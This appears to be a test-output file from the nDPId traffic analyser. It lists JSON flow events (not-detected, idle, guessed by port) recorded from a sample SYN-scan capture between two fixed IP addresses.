+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
